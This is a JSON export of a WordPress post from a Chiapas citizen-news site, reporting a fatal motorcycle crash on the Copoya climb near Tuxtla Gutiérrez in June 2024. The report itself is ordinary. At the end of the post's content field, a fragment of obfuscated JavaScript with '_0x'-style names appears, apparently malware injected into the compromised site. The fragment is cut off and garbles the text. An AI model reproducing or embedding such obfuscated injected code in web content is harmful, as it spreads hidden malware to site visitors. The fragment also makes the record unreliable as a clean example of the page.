{"id":16090,"date":"2024-06-13T03:26:38","date_gmt":"2024-06-13T03:26:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16090"},"modified":"2024-06-13T03:26:39","modified_gmt":"2024-06-13T03:26:39","slug":"motociclista-pierde-la-vida-en-la-subida-a-copoya","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16090","title":{"rendered":"Motociclista pierde la vida en la subida a Copoya"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16091\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249078416-1024x576.jpg\" alt=\"\" class=\"wp-image-16091\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249078416-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249078416-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249078416-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249078416.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16092\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249081177-1024x576.jpg\" alt=\"\" class=\"wp-image-16092\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249081177-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249081177-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249081177-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249081177.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"16093\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249075441-768x1024.jpg\" alt=\"\" class=\"wp-image-16093\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249075441-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249075441-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718249075441.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista perdi\u00f3 la vida este mi\u00e9rcoles por la ma\u00f1ana luego de derrapar en la subida a Copoya.<\/p>\n\n\n\n<p>El sujeto de unos 30 a\u00f1os de edad circulaba sobre el tramo Tuxtla-Suchiapa en una Honda tipo cargo de color blanco en el sentido de Sur a Norte.<\/p>\n\n\n\n<p>Testigos relataron que, en una curva el conductor derrap\u00f3 y al ser una pendiente se arrastr\u00f3 por varios metros.<\/p>\n\n\n\n<p>Lamentablemente por la inercia se impact\u00f3 contra una camioneta Nissan de color blanco.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos del ERUM pero nada pudieron hacer pues hab\u00eda muerto.<\/p>\n\n\n\n<p>Elementos de Bomberos, sacaron el cuerpo con herramientas manuales.<\/p>\n\n\n\n<p>Finalmente los peritos de la Fiscal\u00eda General del Estado, realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista perdi\u00f3 la vida este mi\u00e9rcoles por la ma\u00f1ana luego de derrapar en la subida a Copoya. El sujeto de unos 30 a\u00f1os de edad circulaba sobre el tramo Tuxtla-Suchiapa en una Honda tipo cargo de color blanco en el sentido de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16092,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16090","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16090","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16090"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16090\/revisions"}],"predecessor-version":[{"id":16094,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16090\/revisions\/16094"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16092"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16090"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16090"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16090"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}